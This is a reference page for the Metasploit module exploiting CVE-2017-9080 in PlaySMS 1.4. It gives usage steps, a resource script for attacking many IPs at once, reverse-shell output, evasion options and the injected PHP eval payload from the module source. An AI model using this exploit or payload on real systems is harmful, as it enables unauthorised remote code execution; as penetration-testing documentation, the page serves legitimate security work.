PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/playsms_filename_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
Module: exploit/multi/http/playsms_filename_exec
Source code: modules/exploits/multi/http/playsms_filename_exec.rb
Disclosure date: 2017-05-21
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-9080

This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using playsms_filename_exec against a single host

Normally, you can use exploit/multi/http/playsms_filename_exec this way:

msf > use exploit/multi/http/playsms_filename_exec
msf exploit(playsms_filename_exec) > show targets
    ... a list of targets ...
msf exploit(playsms_filename_exec) > set TARGET target-id
msf exploit(playsms_filename_exec) > show options
    ... show and set options ...
msf exploit(playsms_filename_exec) > exploit

Using playsms_filename_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your playsms_filename_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/playsms_filename_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044.

Verification Steps


Available at Exploit-DB

Vulnerable Application Installation Setup.

  1. Download Application : wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  2. Extract : tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
  3. Move In WebDirectory : mv playsms-1.4/web/* /var/www/html/
  4. make config file: cp /var/www/html/config-dist.php /var/www/html/config.php
  5. Change Owner : chown -R www-data:www-data /var/www/html/
  6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
  7. Now Visit : http://localhost/

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/playsms_filename_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: set targeturi SecreTSMSgatwayLogin
  7. Do: set username touhid
  8. Do: set password diana
  9. Do: check [*] 10.22.1.10:80 The target appears to be vulnerable.
  10. Do: set lport <port>
  11. Do: set lhost <ip>
  12. Do: exploit
  13. You should get a shell.

Scenarios


Playsms on Ubuntu Linux

msf exploit(multi/http/playsms_filename_exec) > run                                                                                    

[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
[*] Trying to Login ......                                                                                                             
[+] Authentication successful : [ touhid:diana ]                                                                                       
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
[*] Trying to upload file with malicious Filename Field....                                                                            
[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
[*] Sleeping before handling stage...                                                                                                  
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     

meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the multi/http/playsms_filename_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/playsms_filename_exec

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/playsms_filename_exec) > show info

       Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
     Module: exploit/multi/http/playsms_filename_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-21

Provided by:
  Touhid M.Shaikh <[email protected]>
  DarkS3curity

Available targets:
  Id  Name
  --  ----
  0   PlaySMS 1.4

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base playsms directory path
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a code injection vulnerability within an 
  authenticated file upload feature in PlaySMS v1.4. This issue is 
  caused by improper file name handling in sendfromfile.php file. 
  Authenticated Users can upload a file and rename the file with a 
  malicious payload. This module was tested against PlaySMS 1.4 on 
  VulnHub's Dina 1.0 machine and Windows 7.

References:
  https://www.exploit-db.com/exploits/42003
  https://nvd.nist.gov/vuln/detail/CVE-2017-9080
  https://www.youtube.com/watch?v=MuYoImvfpew
  http://touhidshaikh.com/blog/?p=336

Module Options


This is a complete list of options available in the multi/http/playsms_filename_exec exploit:

msf6 exploit(multi/http/playsms_filename_exec) > show options

Module options (exploit/multi/http/playsms_filename_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base playsms directory path
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   PlaySMS 1.4

Advanced Options


Here is a complete list of advanced options supported by the multi/http/playsms_filename_exec exploit:

msf6 exploit(multi/http/playsms_filename_exec) > show advanced

Module advanced options (exploit/multi/http/playsms_filename_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/playsms_filename_exec module can exploit:

msf6 exploit(multi/http/playsms_filename_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   PlaySMS 1.4

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/playsms_filename_exec exploit:

msf6 exploit(multi/http/playsms_filename_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/playsms_filename_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/playsms_filename_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to access the index.php file


Here is a relevant code snippet related to the "Unable to access the index.php file" error message:

64:	      res = send_request_cgi({
65:	        'method' => 'GET',
66:	        'uri' => normalize_uri(uri, 'index.php')
67:	      })
68:	    rescue
69:	      vprint_error('Unable to access the index.php file')
70:	      return CheckCode::Unknown
71:	    end
72:	
73:	    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
74:	      return Exploit::CheckCode::Appears

<PEER> - Could not determine CSRF token


Here is a relevant code snippet related to the "<PEER> - Could not determine CSRF token" error message:

88:	      }
89:	    })
90:	
91:	    # Grabbing CSRF token from body
92:	    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
93:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
94:	    vprint_good("X-CSRF-Token for login : #{csrf}")
95:	
96:	    cookies = res.get_cookies
97:	    vprint_status('Trying to Login ......')
98:	    # Send Creds with cookies.

<PEER> - Did not respond to Login request


Here is a relevant code snippet related to the "<PEER> - Did not respond to Login request" error message:

111:	        'username' => datastore['USERNAME'],
112:	        'password' => datastore['PASSWORD']
113:	      }.to_a.shuffle],
114:	    })
115:	
116:	    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
117:	
118:	    # Try to access index page with authenticated cookie.
119:	    res = send_request_cgi({
120:	      'method' => 'GET',
121:	      'uri' => normalize_uri(uri, 'index.php'),

<PEER> - Did not respond to Login request


Here is a relevant code snippet related to the "<PEER> - Did not respond to Login request" error message:

120:	      'method' => 'GET',
121:	      'uri' => normalize_uri(uri, 'index.php'),
122:	      'cookie' => cookies,
123:	    })
124:	
125:	    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
126:	
127:	    # if we redirect to core_welcome dan we assume we have authenticated cookie.
128:	    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
129:	      print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
130:	      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])

<PEER> - Authentication Failed :[ <USERNAME>:<PASSWORD> ]


Here is a relevant code snippet related to the "<PEER> - Authentication Failed :[ <USERNAME>:<PASSWORD> ]" error message:

128:	    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
129:	      print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
130:	      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
131:	      return cookies
132:	    else
133:	      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
134:	    end
135:	  end
136:	
137:	  def exploit
138:	    cookies = login

<PEER> - Did not respond to Login request


Here is a relevant code snippet related to the "<PEER> - Did not respond to Login request" error message:

147:	        'inc' => 'feature_sendfromfile',
148:	        'op' => 'list',
149:	      }.to_a.shuffle]
150:	    })
151:	
152:	    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
153:	
154:	    # Grabbing CSRF token from body.
155:	    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
156:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
157:	    vprint_good("X-CSRF-Token for upload : #{csrf}")

<PEER> - Could not determine CSRF token


Here is a relevant code snippet related to the "<PEER> - Could not determine CSRF token" error message:

151:	
152:	    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
153:	
154:	    # Grabbing CSRF token from body.
155:	    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
156:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
157:	    vprint_good("X-CSRF-Token for upload : #{csrf}")
158:	
159:	    # Payload.
160:	    evilname = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
161:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Touhid M.Shaikh <touhidshaikh22[at]gmail.com>
  • DarkS3curity

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.